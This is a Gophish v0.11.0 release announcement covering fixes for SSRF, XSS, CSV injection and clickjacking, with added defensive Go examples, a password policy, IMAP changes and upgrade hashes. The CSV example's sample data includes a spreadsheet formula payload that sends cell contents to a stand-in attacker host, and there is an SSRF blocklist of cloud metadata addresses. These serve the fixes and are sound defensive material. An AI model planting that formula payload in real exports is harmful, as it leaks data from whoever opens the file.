Gophish just got better.
We’re excited to announce the release of Gophish v0.11.0. This release includes important security fixes, adds some minor features, and fixes some bugs.
Security Fixes
This release addresses multiple security issues that were identified and reported by the community. As always, we encourage sending in security reports via our security policy, and we are grateful for all the work that went into finding and reporting these vulnerabilities.
The following vulnerabilities were fixed in this latest release:
Server-side Request Forgery (SSRF)
Reported by: Marcus Nilsson of usd AG
Reported by: @dunderhay in #1908
An authenticated user could use certain features of Gophish to make the server open connections to hosts on its local network. The most critical of these is the Landing Page import feature, which could be used to make arbitrary web requests from the server to any upstream address.
Since importing local web pages, or otherwise making local network connections (e.g. to SMTP/IMAP servers, webhook URLs, etc.), is an expected use case for Gophish, we've decided to implement an opt-in allowlist. By default, we block access only to the known IP addresses commonly associated with cloud metadata services, but it is now possible to explicitly set the allowed_internal_hosts configuration variable in the admin_server section of config.json to a list of allowed internal addresses.
More information can be found here.
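The following is an added example written for this post, not Gophish's own dialer code: an SSRF guard of the kind the release notes describe, with the allowlist read from the admin_server.allowed_internal_hosts key. The blocklist contents, the config fragment and all function names are assumptions for the example. The check runs in a net.Dialer Control hook, i.e. after DNS resolution, so it sees the final IP and cannot be bypassed by a hostname that resolves to a metadata address or by an HTTP redirect.

```go
package main

// Added example, not Gophish's own dialer: addresses on the metadata
// blocklist are refused unless admin_server.allowed_internal_hosts lists
// them (or a network containing them); everything else is allowed, matching
// the "block only metadata by default" behaviour described in the post.

import (
	"encoding/json"
	"fmt"
	"net"
	"net/http"
	"syscall"
	"time"
)

// metadataAddrs are well-known cloud metadata endpoints. Assumption for this
// example; extend the list for your environment.
var metadataAddrs = []string{"169.254.169.254/32", "fd00:ec2::254/128"}

// Guard decides which destination IPs the server may connect to.
type Guard struct {
	allowed []*net.IPNet
	denied  []*net.IPNet
}

// parseNets accepts CIDR ranges or bare IPv4/IPv6 addresses.
func parseNets(entries []string) ([]*net.IPNet, error) {
	nets := make([]*net.IPNet, 0, len(entries))
	for _, e := range entries {
		if _, n, err := net.ParseCIDR(e); err == nil {
			nets = append(nets, n)
			continue
		}
		ip := net.ParseIP(e)
		if ip == nil {
			return nil, fmt.Errorf("allowed_internal_hosts: %q is not an IP or CIDR", e)
		}
		mask := net.CIDRMask(32, 32)
		if ip.To4() == nil {
			mask = net.CIDRMask(128, 128)
		}
		nets = append(nets, &net.IPNet{IP: ip, Mask: mask})
	}
	return nets, nil
}

// NewGuard builds a guard from the operator's allowlist.
func NewGuard(allowedInternalHosts []string) (*Guard, error) {
	allowed, err := parseNets(allowedInternalHosts)
	if err != nil {
		return nil, err
	}
	denied, _ := parseNets(metadataAddrs) // the constants above are valid CIDRs
	return &Guard{allowed: allowed, denied: denied}, nil
}

// Allowed reports whether ip may be dialled: explicit allowlist first, then
// the metadata blocklist, then allow by default.
func (g *Guard) Allowed(ip net.IP) bool {
	for _, n := range g.allowed {
		if n.Contains(ip) {
			return true
		}
	}
	for _, n := range g.denied {
		if n.Contains(ip) {
			return false
		}
	}
	return true
}

// Control is the net.Dialer hook; the dialer always passes "ip:port" here.
func (g *Guard) Control(network, address string, _ syscall.RawConn) error {
	host, _, err := net.SplitHostPort(address)
	if err != nil {
		return err
	}
	ip := net.ParseIP(host)
	if ip == nil {
		return fmt.Errorf("ssrf guard: refusing non-literal host %q", host)
	}
	if !g.Allowed(ip) {
		return fmt.Errorf("ssrf guard: connection to %s is blocked", ip)
	}
	return nil
}

// HTTPClient returns a client whose every connection, including those made
// while following redirects, passes through the guard.
func (g *Guard) HTTPClient() *http.Client {
	d := &net.Dialer{Timeout: 30 * time.Second, Control: g.Control}
	return &http.Client{Timeout: 30 * time.Second, Transport: &http.Transport{DialContext: d.DialContext}}
}

// GuardFromConfig reads admin_server.allowed_internal_hosts from config.json.
func GuardFromConfig(raw []byte) (*Guard, error) {
	var c struct {
		AdminServer struct {
			AllowedInternalHosts []string `json:"allowed_internal_hosts"`
		} `json:"admin_server"`
	}
	if err := json.Unmarshal(raw, &c); err != nil {
		return nil, err
	}
	return NewGuard(c.AdminServer.AllowedInternalHosts)
}

func main() {
	// Constructed config fragment containing only the key this example needs.
	g, err := GuardFromConfig([]byte(`{"admin_server": {"allowed_internal_hosts": ["10.0.0.0/8"]}}`))
	if err != nil {
		panic(err)
	}
	for _, dst := range []string{"169.254.169.254:80", "[fd00:ec2::254]:80", "10.1.2.3:25", "93.184.216.34:443"} {
		fmt.Printf("%-22s -> %v\n", dst, g.Control("tcp", dst, nil))
	}
	_ = g.HTTPClient() // use instead of http.DefaultClient for page import, webhooks, etc.
}
```

With the constructed config, the two metadata addresses are refused and the other destinations are accepted. Listing 169.254.169.254 itself (or 169.254.0.0/16) in allowed_internal_hosts would re-enable it, which is exactly the opt-in the post describes; leave the key unset unless a deployment genuinely needs to import from such an address.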
Cross-Site Scripting (XSS)
Reported by: Marcus Nilsson of usd AG
Reported by: @dunderhay in #1901
Various cross-site scripting issues were identified and fixed. All of them required authenticated access and affected only the user who created the objects, or an administrator using our "Impersonate" feature to impersonate that user.
More information can be found in 4e9b94b and 19ef924.
CSV Injection
Reported by: Marcus Nilsson of usd AG
Malicious data could be submitted during a campaign (for example, in a form captured by a landing page) that, when exported as a CSV and opened in a spreadsheet application, is interpreted as a formula, potentially leading to command execution on the machine of whoever opens the export.
More information on CSV Injection can be found here. More information about the fix can be found in b25f5ac.
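As an added example for this section (written for this post, not the change in b25f5ac), a common defence against CSV injection is to neutralise any cell a spreadsheet would evaluate before it is written to the export. The trigger character set and the sample rows are assumptions constructed for the example.

```go
package main

// Added example, not the fix from b25f5ac: a value beginning with =, +, -, @,
// tab or carriage return gets a leading single quote, which spreadsheet
// applications display as plain text, and the standard CSV writer quotes
// fields containing commas, quotes or newlines so the prefix cannot be
// split off by the surrounding row.

import (
	"bytes"
	"encoding/csv"
	"fmt"
	"strings"
)

// formulaTriggers are the leading characters spreadsheet applications treat
// as the start of a formula (assumption: the set OWASP lists for Excel,
// LibreOffice and Google Sheets).
const formulaTriggers = "=+-@\t\r"

// SanitizeCell returns s in a form that is displayed rather than evaluated.
func SanitizeCell(s string) string {
	if s != "" && strings.IndexByte(formulaTriggers, s[0]) >= 0 {
		return "'" + s
	}
	return s
}

// ExportCSV writes rows (header first) with every cell sanitised and returns
// the CSV text.
func ExportCSV(rows [][]string) (string, error) {
	var buf bytes.Buffer
	w := csv.NewWriter(&buf)
	for _, row := range rows {
		clean := make([]string, len(row))
		for i, cell := range row {
			clean[i] = SanitizeCell(cell)
		}
		if err := w.Write(clean); err != nil {
			return "", err
		}
	}
	w.Flush()
	return buf.String(), w.Error()
}

func main() {
	// Constructed campaign results; the last row's "position" is the kind of
	// value a target could type into a captured form field.
	rows := [][]string{
		{"email", "position", "status"},
		{"alice@example.com", "Analyst", "Submitted Data"},
		{"mallory@example.com", `=HYPERLINK("https://attacker.example/?"&A2,"Open")`, "Submitted Data"},
	}
	out, err := ExportCSV(rows)
	if err != nil {
		panic(err)
	}
	fmt.Print(out)
}
```

The prefix approach keeps the original text visible to the analyst reading the export, which matters for phishing results where the submitted value itself is evidence. Strict environments sometimes strip the trigger characters instead; either way the point is that exported data is treated as untrusted input on the way out, not only on the way in.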
Clickjacking
Reported by: Marcus Nilsson of usd AG
An attacker could embed the Gophish settings page in an iframe on a page they control and trick an authenticated administrator into unexpectedly clicking the "Reset" button, resetting the administrator's API key and potentially causing a denial of service for any tooling that uses that key.
More information about the fix can be found in 6df62e8.
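As an added example (written for this post; whether 6df62e8 does exactly this is not stated here), the standard server-side defence against clickjacking is to forbid framing of the admin UI. The middleware below sets both the legacy X-Frame-Options header and the current Content-Security-Policy frame-ancestors directive, and a small helper exercises it with net/http/httptest so the result can be checked without starting a server. The handler and function names are assumptions.

```go
package main

// Added example, not the change in 6df62e8: deny framing of every response
// served by the admin UI so the Reset button cannot be overlaid by an
// attacker's page.

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// NoFraming wraps a handler and marks its responses as not embeddable.
func NoFraming(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		h := w.Header()
		h.Set("X-Frame-Options", "DENY")                        // legacy browsers
		h.Set("Content-Security-Policy", "frame-ancestors 'none'") // current standard
		next.ServeHTTP(w, r)
	})
}

// Settings is a stand-in for the settings page handler (assumption).
func Settings(w http.ResponseWriter, r *http.Request) {
	fmt.Fprintln(w, `<button id="reset">Reset</button>`)
}

// FramingHeaders issues a request against the wrapped handler in-process and
// returns the two anti-framing headers from the response.
func FramingHeaders() (xfo, csp string) {
	rec := httptest.NewRecorder()
	NoFraming(http.HandlerFunc(Settings)).ServeHTTP(rec, httptest.NewRequest("GET", "/settings", nil))
	return rec.Header().Get("X-Frame-Options"), rec.Header().Get("Content-Security-Policy")
}

func main() {
	xfo, csp := FramingHeaders()
	fmt.Println("X-Frame-Options:", xfo)
	fmt.Println("Content-Security-Policy:", csp)
}
```

Header.Set overwrites any Content-Security-Policy the application already sends; if there is one, add frame-ancestors 'none' to that policy rather than replacing it. Anti-framing headers stop the overlay trick but do not replace a CSRF token on the reset request itself, which protects the same endpoint against a different attack.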
Adding a Password Policy
This release adds a basic password policy for administrator accounts and removes the default password "gophish". Instead, an initial password is randomly generated and printed to the terminal when Gophish is launched for the first time.
If needed, the initial password and API key can be overridden with environment variables.
More Robust IMAP Support
This release adds support for recognising reported emails that were forwarded as an attachment. It also switches to a more robust underlying IMAP library, eliminating some potential bugs.
Credit to @glennzw for the changes!
Changelog
You can find the full changelog for this release here.
How to Upgrade
To upgrade, download the release for your platform and check its SHA256 hash against the table below. Extract the archive into a new folder and copy (copy, not move, so that you keep a backup) your existing gophish.db file into that directory. Then run the new Gophish binary and you'll be good to go!
Now, one more thing:
We want to hear from you!
Have questions, comments, or feature ideas about Gophish? Let us know by filing an issue.
Enjoy
| SHA256 Hash | Filename |
|---|---|
| beb32e243e888f21849d3ee09a979a33cd1da7a7cd79438c8f56fce1a2d9d44c | gophish-v0.11.0-linux-32bit.zip |
| f33ac7695850132c04d190f83ef54732421a8d4578be1475d3a819fe6173c462 | gophish-v0.11.0-linux-64bit.zip |
| f1af96033c946ed2fe757b9b3a7aefc63ec3548f0ab21f01c44d70a58410ffbe | gophish-v0.11.0-osx-64bit.zip |
| f5083bc084715319a4e671bc58dc28f66828fec78a43bd41456373fcc024703c | gophish-v0.11.0-windows-64bit.zip |